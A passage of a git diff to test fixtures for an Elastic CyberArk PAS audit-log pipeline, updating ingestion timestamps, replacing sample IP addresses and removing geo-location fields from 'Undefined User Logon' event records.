Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json index 79cbd597d77..c90ee6bc199 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json @@ -58,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715271800Z", + "ingested": "2021-12-09T13:36:53.859779600Z", "original": "\u003c7\u003e1 2021-03-08T18:31:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:31:52\",\"IsoTimestamp\":\"2021-03-08T18:31:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansr\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -133,7 +133,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715285900Z", + "ingested": "2021-12-09T13:36:53.859787800Z", "original": "\u003c7\u003e1 2021-03-08T18:32:03Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:03\",\"IsoTimestamp\":\"2021-03-08T18:32:03Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansra\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -157,20 +157,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -190,7 +178,7 @@ "PSMAdmin" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -198,8 +186,8 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-11T16:43:26Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "PSMAdmin", @@ -212,8 +200,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715289Z", - "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:53.859793400Z", + "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", @@ -236,20 +224,8 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "127.0.0.1", @@ -277,7 +253,7 @@ ], "ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -285,9 +261,9 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-11T17:46:28Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "127.0.0.1", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "adrian", @@ -300,8 +276,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715291600Z", - "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:53.859798700Z", + "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", @@ -324,33 +300,12 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -373,8 +328,8 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { @@ -382,9 +337,9 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-14T13:28:00Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "testark", @@ -397,8 +352,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715294Z", - "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:36:53.859804100Z", + "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User 